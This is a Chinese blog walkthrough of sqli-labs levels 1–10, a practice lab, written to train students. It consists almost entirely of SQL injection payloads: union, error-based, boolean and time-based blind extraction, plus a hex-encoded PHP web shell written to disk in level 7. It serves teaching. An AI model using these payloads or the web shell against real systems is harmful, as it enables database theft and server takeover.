最近在给协会的小朋友搞培训,顺手写了 sqli-labs 1-10 关的 WP(writeup),就发出来一下吧。(做题时的环境是 BUUCTF 上的 basic 版 sqli-labs。)
第一关(字符型)
-
判断是否存在注入:?id=1' and 1=2%23
-
判断字段数:?id=1' order by 3%23
-
判断回显:?id=-1' union select 1,2,3%23
-
爆数据库名:?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1' union select 1,group_concat(flag),3 from ctftraining.flag%23
第二关(数字型)
-
判断是否存在注入:?id=1 and 1=2%23
-
判断字段数:?id=1 order by 3%23
-
判断回显:?id=-1 union select 1,2,3%23
-
爆数据库名:?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1 union select 1,group_concat(flag),3 from ctftraining.flag%23
第三关(单引号加括号型)
-
判断是否存在注入:?id=1') and 1=2%23
-
判断字段数:?id=1') order by 3%23
-
判断回显:?id=-1') union select 1,2,3%23
-
爆数据库名:?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1') union select 1,group_concat(flag),3 from ctftraining.flag%23
第四关(双引号加括号型)
-
判断是否存在注入:?id=1") and 1=2%23
-
判断字段数:?id=1") order by 3%23
-
判断回显:?id=-1") union select 1,2,3%23
-
爆数据库名:?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-
爆表名:?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23
-
爆字段:?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
-
爆数据:?id=-1") union select 1,group_concat(flag),3 from ctftraining.flag%23
第五关(报错注入或字符型盲注)
-
判断是否存在注入:?id=1'
-
爆数据库:?id=1' and updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),1,31),'~'),1)%23
-
爆数据表:?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),'~'),1)%23
-
爆字段:?id=1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),1,31),'~'),1)%23
-
爆数据:
-
?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),1,31),'~'),1)%23
-
?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),32,64),'~'),1)%23
盲注
-
判断是否存在注入:?id=1' and 0%23
-
判断数据库名长度:?id=1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23
-
爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
第六关(双引号字符型盲注)
-
判断是否存在注入:?id=1" and 0%23
-
判断数据库名长度:?id=1" and (length((select group_concat(schema_name) from information_schema.schemata))>68)%23
-
爆数据库名:?id=1" and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1" and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1" and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
爆数据:?id=1" and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23
第七关(写shell)
-
写shell:?id=0')) union select null,0x3c3f706870206576616c28245f504f53545b225968636b225d293b3f3e,null into outfile '路径/0.php' --+
第八关(字符型盲注)
-
判断是否存在注入:?id=1' and 0%23
-
判断数据库名长度:?id=1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23
-
爆数据库名:?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23
-
爆表名:?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23
-
爆字段:?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23
-
爆数据:?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23
第九关(单引号字符型时间盲注)
-
判断是否存在注入:?id=1' and sleep(5)%23
-
判断数据库名长度:?id=1' and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23
-
爆数据库名:?id=1' and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23
-
爆表名:?id=1' and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23
-
爆字段:?id=1' and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23
-
爆数据:?id=1' and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23
第十关(双引号字符型时间盲注)
-
判断是否存在注入:?id=1" and sleep(5)%23
-
判断数据库名长度:?id=1" and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23
-
爆数据库名:?id=1" and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23
-
-
爆字段:?id=1" and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23
-
爆数据:?id=1" and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23